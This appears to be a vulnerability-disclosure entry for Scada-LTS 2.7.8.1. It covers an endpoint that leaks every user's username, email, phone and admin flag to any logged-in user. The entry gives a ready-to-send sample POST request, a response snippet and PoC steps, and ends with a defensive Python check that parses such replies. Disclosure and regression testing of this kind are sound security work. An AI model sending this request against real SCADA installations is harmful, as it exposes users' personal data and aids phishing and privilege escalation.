Submission #621062: SCADA-LTS Scada-LTS 2.7.8.1 Exposure of Private Personal Information to an Unauthorized Acto (Info)

Title: SCADA-LTS Scada-LTS 2.7.8.1 Exposure of Private Personal Information to an Unauthorized Acto

Description:

Sensitive User Information Disclosure via WatchListDwr.init.dwr Endpoint

Summary

A vulnerability was identified in the WatchListDwr.init.dwr endpoint of SCADA-LTS that allows any authenticated user, even with minimal permissions, to access sensitive user information including usernames, emails, phone numbers, and admin status. This flaw constitutes an Information Disclosure issue and could be used to facilitate further attacks such as phishing, privilege escalation, or social engineering.

Details

Vulnerable Endpoint: POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr
Authentication Required: Yes (low-privileged user)
Affected Parameter: N/A (static DWR call)
Impact Type: Information Disclosure

By issuing a crafted POST request to the vulnerable endpoint, a low-privileged user is able to retrieve detailed information of all users in the system. The backend responds with a full JavaScript object containing data such as usernames, emails, admin flags, and phone numbers.

Sample Request:

    POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1
    Host: kubernetes.docker.internal:8080
    Content-Type: text/plain

    callCount=1
    page=/Scada-LTS/watch_list.shtm
    httpSessionId=
    scriptSessionId=XYZ123456789
    c0-scriptName=WatchListDwr
    c0-methodName=init
    c0-id=0
    batchId=1

Sample Response Snippet (JavaScript):

    s7.admin=true;
    s7.email="[email protected]";
    s7.username="admin";
    s8.admin=false;
    s8.email="[email protected]";
    s8.username="anonymous";
    s11.admin=false;
    s11.email="[email protected]";
    s11.phone="13212313131";
    s11.username="user1";

Proof of Concept (PoC)

1. Authenticate as any valid low-privileged user.
2. Send the above POST request to /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr.
3. Observe the server response containing sensitive information of all users in the SCADA system.

Impact

- Privacy Violation: Emails, phone numbers, and usernames of all users, including administrators, are exposed.
- Privilege Escalation Support: Knowledge of admin usernames and roles could be leveraged in further attacks.
- Phishing and Social Engineering: Exposed contact information can be used to craft highly targeted attacks.
- Reconnaissance: Attackers can map the user structure of the SCADA-LTS system for further exploitation.

References

SCADA-LTS – Official Repository

Discoverer

Natan Maia Morette by CVE-Hunters
Source: ⚠️ https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/Sensitive%20User%20Information%20Disclosure%20via%20WatchListDwr.init.dwr%20Endpoint.md
User: nmmorette (UID 87361)
Submitted: 2025-07-23 01:18 AM (9 months ago)
Moderation: 2025-08-19 07:39 AM (27 days later)
Status: Accepted
VulDB entry: 320519 [Scada-LTS 2.7.8.1 WatchListDwr.init.dwr information disclosure]
Points: 20
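
A regression check for the disclosure described in the submission above, added here as an example (not code from the advisory or from the Scada-LTS project): it parses a captured WatchListDwr.init reply and reports user records that belong to an account other than the one that made the request. The sample reply is constructed from the response snippet in the description with placeholder e-mail addresses, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Fields the advisory lists as exposed in the WatchListDwr.init reply.
SENSITIVE_FIELDS = {"admin", "email", "phone", "username"}

# DWR plaincall replies assign properties as  sN.field=value;  (form shown in the advisory).
# Quoted values are matched first so a ';' inside a string does not end the value early.
ASSIGNMENT = re.compile(r'\b(s\d+)\.(\w+)=("(?:[^"\\]|\\.)*"|[^;]*);')


def extract_user_objects(body):
    """Group sN.field=value assignments and keep objects that look like user records."""
    objects = defaultdict(dict)
    for var, field, raw in ASSIGNMENT.findall(body):
        if field in SENSITIVE_FIELDS:
            objects[var][field] = raw.strip('"')
    return {var: fields for var, fields in objects.items() if "username" in fields}


def foreign_records(body, session_user):
    """Return (username, exposed fields) for records not owned by the requesting account."""
    return sorted(
        (fields["username"], sorted(set(fields) - {"username"}))
        for fields in extract_user_objects(body).values()
        if fields["username"] != session_user
    )


# Constructed sample: same shape as the advisory's snippet, placeholder addresses.
SAMPLE_REPLY = (
    's7.admin=true; s7.email="admin@example.test"; s7.username="admin"; '
    's8.admin=false; s8.email="anon@example.test"; s8.username="anonymous"; '
    's11.admin=false; s11.email="user1@example.test"; '
    's11.phone="13212313131"; s11.username="user1";'
)

if __name__ == "__main__":
    # Reply captured while logged in as the low-privileged account "user1".
    leaked = foreign_records(SAMPLE_REPLY, "user1")
    for username, fields in leaked:
        print(f"FAIL: record for {username!r} exposes {', '.join(fields)}")
    if not leaked:
        print("OK: reply contains only the requesting user's record")
```

Run against a reply captured from a patched build, the check should report no foreign records for a non-admin session.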